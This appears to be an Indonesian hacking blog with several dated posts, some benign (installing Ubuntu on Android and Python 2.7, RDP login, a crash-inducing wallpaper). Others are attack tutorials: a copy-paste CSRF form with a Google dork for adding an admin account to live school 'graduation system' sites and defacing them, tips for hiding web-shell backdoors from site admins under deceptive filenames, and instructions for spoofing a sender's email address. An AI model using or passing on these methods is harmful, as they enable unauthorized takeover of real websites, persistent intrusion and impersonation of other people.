Wednesday, June 10, 2020

Cara Deface Sistem kelulusan Add Admin

Yow Whatsapp guys,
Wellcome back with me.
 Kali ini kita akan membahas cara deface sistem kelulusan add admin, sama kyk cbt v2.8 add admin xixi..

Bahan bahan :
1.Kouta :v
2.Csrf :
Kalian copas aja..
<html>
<body>
<center>
<iframe width="560" height="315" src="https://www.youtube.com/embed/iQjtQvHwi4c" frameborder="0" allow="accelerometer; autoplay; encrypted-media; gyroscope; picture-in-picture" allowfullscreen></iframe>
<hr>
<form action="http://localhost.com/[path]admin/tambahuser.php" method="POST">
<input type="text" class="form-control" name="nama" placeholder="Username" size="35">
<br>
<input type="text" class="form-control" name="username" placeholder="Spear" size="35">
<br>
<input type="text" class="form-control" name="pass" placeholder="Security" size="35">
<br>
<br>
<input type="submit" name="submit" id="submit" value="Simpan Data" class="btn btn-primary" onclick="tb_remove()">
</form>
<hr>
<h1> CODED BY SPEAR-SECURITY </h1>
<h2> Author Extinction </h2>
</body>
</html>
 Dork : intext:"Selamat datang di Sistem"
Author : Spear Security

Pertama kalian copy dan paste ke file csrf.html.
Kedua, ganti localhostnya jadi live target kalian.
Kalian masukan user dan password terserah kaliankalian >> klik simpan data. Jika berhasil akan seperti gambar dibawah.

Jika sudah kalian login, jika berhasil berarti vuln :D

Monday, June 8, 2020

Cara Supaya Shell Backdoor Kalian Tidak Di Tikung Atau Di Hapus Admin

Yow exploiter, 
Wellcome back with me. 
Kali ini saya akan membagikan tips and trick supaya shell backdoor tidak ditikung atau di hapus admin. Kenapa gua buat konten blog kyk gini? Karna temen gua pada nanyain, 
"Nar, Cara Menurut lu Biar ga dihapus admin atau ditikung gimana?" Karna gua males jawab satu satu ya gua buat konten aja xixi... 
Langsung aja ke tips and tricknya.

- Pertama, tempat upload atau menyembunyikan shell backdoor yang tepat. 
Biasanya sih banyak yang upload di public_html kan? Nah jadinya si admin gampang tau. Kalo gua pribadi sih sering upload di .well-known, cgi-bin, wp-content, atau wp-admin. Jadinya si admin bingung dimana shell kita😁. Dan cara ini menurut gua paling berguna soalnya shell gua bisa aman sampe berbulan bulan karna trick ini xixi.. 

- Cara yang kedua, Menggunakan Shell backdoor ber Password. 
Ya jawabnya simple aja biar ga ditikung :v ya kalo defacer lain tau password default shell lu, cepet cepet ganti deh biar ga kena tikung kyk gua dulu :(

- Cara ketiga, menggunakan shell bertitle 404 Not Found atau Shell yang tidak bisa di dorking seperti alfa team shell. 
Jawabanny simple, supaya tidak bisa di dorking orng lain menggunakan google dork. Lumayan banyak orang menggunakan google dork untuk mencari shell backdoor orng lain :v
Seperti saya menggunakan shell 404 Not Found Seperti Gambar Di bawah. 
*itu shell bro, kalo ga percaya ya sudahlah

- Cara keempat, menggunakan nama yang bisa menipu admin. 
Contohnya :
404.php
wp-users.php
index.php *biasanya gua pake nama ini kalo upload di .well-known atau cgi-bin seperti kalian lihat gambar sebelumnya adalah shell saya :v
wp-links-mail.php
edit.php
admin.php
*pikirin lagi :v

See you next Content.. 
dan semoga bermanfaat :D

Sunday, June 7, 2020

Cara Install Ubuntu Di Android


Yow whatsapp guys, 
Wellcome back with me. 
Kali ini saya akan membagikan cara Install ubuntu di Android :D
Cara cukup simpe dan Gampang xixi.. 

Bahan bahan :
- Apk Ubuntu Works
- Kouta :v

Kalian install dulu apk Ubuntu Worksnya. 

Jika sudah tampilan awalnya akan seperti di gambar dibawah ini. 
Nah, saya saranin pake Ubuntu yang paling atas berwarna oranye. 
Setelah kalian pilih lalu klik aja. 
Kalian tunggu 30dtk sampai waktu mundurnya selesai xixi.. 
Nikmati prosesnya... 
Dan Berhasil :D
Cara sangat gampang ya kawan kawan xixi.. 

Sekian dari saya, 
Jangan lupa baca artkel lainnya :D

Saturday, June 6, 2020

Cara Email Orang Dengan Kostum Email atau Spoofing

Yow whatsapp guys,
Kali ini kita akan mencoba mengemail orang lain dengan costum email atau istilahnya spoofing.
Sedikit penjelasan tentang spofing :
Spoofing email mengacu pada email yang tampaknya berasal dari satu sumber ketika sebenarnya dikirim dari sumber lain. Individu, yang mengirim email "sampah" atau "SPAM", biasanya ingin email tersebut muncul dari alamat email yang mungkin tidak ada. Dengan cara ini, email tidak dapat dilacak kembali ke originator.

Spoofing sangat berbahaya
Ada banyak kemungkinan alasan mengapa orang mengirim email yang memalsukan alamat pengirim: kadang-kadang hanya untuk menimbulkan kebingungan, tetapi lebih sering untuk mendiskreditkan orang yang alamat emailnya dipalsukan: menggunakan nama mereka untuk mengirim pesan yang keji atau menghina.
Source: sec.linuxploit

"Bisa kostum emaik contohnya justin@gmail.com ga bang? "
bisa, mau hacker@gmail.com atau iribilangboss@gmail.com juga bisa :v
Caranya gampang sekali xixixi..
Kalian hanya perlu suatu tools yaitu :
https://emkei.cz
Kalian visit dulu website diatas.
tampilannya nanti kayak gini..
Kalian isi From Name : (Dari siapa, misalnya dari Justin. Tulis aja justin).
Kedua, From Email To : (Mau pake email siapa aja bebas)
Ketiga, To : (Mau ngirim emailnya ke siapa, ketemen contohnya xixi..)
Subject : (Judul pesan email)
Dan terkhir text: (Kalian isi mau nulis apa mislanya Hallo My Friends)

Kalo msh blom ngerti bisa liat gambar dibawah ini.
Kalian klik send.
Kalo kalian engga percaya bisa coba sendiri :D
Gua udah coba kirim ke email gua dan hasilnya bisa kalian liat sendiri di gambar diatas😆

Thursday, June 4, 2020

Perbedaan Url Poisoning dengan XSS

Yow exploiter,
Kembali lagi ke my blog xixixi...
Kali ini kita akan membahas perbedaan Url Poisoning dengan XSS.
Url Poisoning bukan lah bug melainkan hanya sebuah text yang di search pada kolom search atau yang lain, yang memunculkan tulisan yang dicari misalnya Hacked By Heker, nah akan muncul sebuah kata kata seolah olah di hack tapi ternyata tidak. Proof of concept ini biasanya di gunakan untuk candaan atau ingin melakukan push mirror. Perbedaannya Url Poisoning dengan XSS adalah XSS bug dan Url Poisoning bukan bug.

"Bang, manakah yang lebih berbahaya?"
Kita lihat Url poisoning bukan bug otomatis tidak berbahaya xixixi.. 

Nah kalo XSS kita dapet mencuri cookie admin yang bisa digunakan untuk attacker menjadi admin tanpa login :D
Proses pencurian cookie disebut Cookie Stealing. 

Apakah kalian sudah paham perbedaan Url poisoning dan XSS? 
Sekian materi dari saya, 
Semoga bermanfaat :D

Wednesday, June 3, 2020

Cara Login RDP di PC dan Android

Yow exploiter, 
Kali ini saya akan memberikan tutorial yang sangat gampang :D
Yaitu Cara login RDP di Android dan PC. 
Mungkin ada yang belom tau caranya langsung aja simak xixixi... 

Bahan bahan login for android :
- Kouta :v
- Account RDP
- Remote Desktop

Seperti Yang gua bilang cara nya sangat gampang, 
Kalian install dulu Remote Desktop di PlayStore atau bisa juga menggunakan link diatad xixi.. 

Lalu kalian klik tombol titik tiga disebelah kiri. 
Lalu klik lagi Desktop seperti gambar dibawah ini. 
Tinggal kalian login aja :D 
Gua jelasin sampe sana karna gua tau lu semua pinter pinter hehehe :v

Lanjut Login RDP di PC xixi.. 
Bahan bahan login for PC :
- Kouta lagi gayn :v
- Account RDP

Cara Login Di PC lebih gampang dari Di Android karna PC adalah Desktop :v
Langsung aja, pertama kalian klik pojok kiri bawah >> search >> Remote Desktop Connection >> Enter atau klik.
Nah tampilannya bakalan hampir sama seperti di Android. 
Tinggal kalian login aja gayn :D

Sekian penjelasan dari saya, 
Jika ada kata kata yang kurang mengenang. 
Saya meminta maaf sesama manusia :v

Tuesday, June 2, 2020

Viral!! Wallpaper Yang Bisa Membuat Handphone Anda Crash

Sedang viral viralnya tentang sebuah gambar atau wallpaper yang dapat mereset atau membuat handphone crash jika gambar tersebut di gunakan sebagai wallpaper. Bug ini hanya bisa atau work di handphone samsung dan pixel, saya juga tidak tau pasti kenapa handphone kecuali samsung dan pixel tidak bekerja mungkin handphone seperti xiaomi atau oppo memiliki pola algoritma yang berbeda dari samsung. Itu menurut pendapat saya, jika kalian punya pendapat silahkan komen dibawah.

Menurut detik.com
Kemungkinan wallpaper tersebut membawa metadata yang mengandung kode yang bikin Java Runtime error.
"Kode ini memanfaatkan bug atau pola algoritma tertentu di handset menjadi kacau. Biasanya saat ada kesalahan dikenali oleh OS, maka yg pertama dilakukan adalah me-restart diri, agar 'kerusakan' tidak merembet," terangnya.

ada juga yg bilang ini
color space nya ga support di android,
jadi image processing nya crash, hasilnya
system ui crash beberapa detik
Kalau di debug bakal menghasilkan error
pada systemui spt ini
Caused by:
java.lang.ArraylndexOutOfBoundsException:
length=256; index=256
Nah yg biasa android pake itu RGB color,
max nya 255.
Karena itu wallpaper melebihi 255, maka
terjadilah crash, yg ga cocok file system
wallpaper nya.
Cara mudah nya fix di source android,
mentokin limit color nya jadi 255
https://github.com/aosp-mirror
/platform frameworks base/blob
Imaster/packages/SystemUl/src
/com/android/systemui/glwallpaper
ZimageProcessHelper.java?fbclid=
IWAR229KFFUgoxkzcXeyY4sXzRguT6k
uIN1pVEWpPy2Enb6CnlysprTUAyo#L139
Tambah
if (y > 255) y = 255;
Jadinya ga crash lagi karena
java, lang.ArrayindexOutOfBoundsException
tadi
Untuk rom lain, spt miui, oneul, aosp, dll
Ini tergantung wallpaper juga, klo di miui
habis set wallpaper langsung di crop
wallpapernya, hasilnya wallpaper cropped
dan converted dan ga original
Untuk aosp juga tergantung launcher,
klo spt pixel dan pixel experience ya gitu,
karena launcher
Di
Kalau oneui dia ga crop lagi, langsung ambil
dari sumber, makanya pas processing
wallpaper systemui crash karena limit tadi
Untuk
hp yg sudah terinstall twrp bisa hapus
wallpapernya di:
- /data/system/users/0/wallpaper
Kalau usb debugging aktif bisa ganti
wallpaper.
https://stackoverflow.com
/questions/31954328/change
-android-wallpaper-with-adb?fbclid=
IwAR1n1S4dizmpIS709shsewMH6BixeHmq
04avel1Lxts1DDUNmXK1Zswryko
~
Mungkin kalian penasaran gimana sih tampilan gambarnya kan?? Dibawah ini adalah tampilan dari gambar tersebut..
Sekilas memang tidak ada yang berbeda bukan? Tapi ada juga setelah menggunakan wallpaper tersebut tidak error dan ada juga yang error. Buat yang handphonenya samsung boleh tuh dicoba :v tapi gua saranin jangan apa lagi menyangkut data data penting ea..

Mungkin kalian punya penjelasan lebih lengkap atau sebenarnya ini adalah hoax? Bisa tulis dikolom komentar :D

Friday, May 29, 2020

Cara Install Python 2.7

Hallo exploiter, 
Kembali ke my blog xixi..
Kali ini saya akan memberikan tutorial cara install python 2.7
Sebelum itu pasti ada yang bertanya
"Bang, fungsi python 2.7 apaan?"
Fungsi python 2.7 banyak guys salah satu ngebot xixi..

Langsung aja..
Bahan bahan :
- Pc atau Laptop
- Kouta guys :v
- Link
https://www.python.org/download/releases/2.7

Pertama tama kalian buka link yang diatas,
Lalu download :
Windows X86-64 MSI Installer (2.7.0) [1] (sig)

Setelah itu kalian install seperti biasa xixi.. 
Lalu kalian buka control panel >> Search >> Environment seperti gambar dibawah ini  :
Lalu kalian klik pilihan yang ada disana xixi..
Lalu ke Advanced System Settings >> Environment Variabels >> Klik Path >> Edit 
Setelah itu tambahkan ;C:\Python27; seperti gambar dibawah :
Dan klik Ok 

Python 2.7 Berhasil di install :D
Cara liatnya kalo udah berhasil gimana bang?
Kalaian bukan cmd lalu masukan command python.
 Gampang kan teman teman xixi..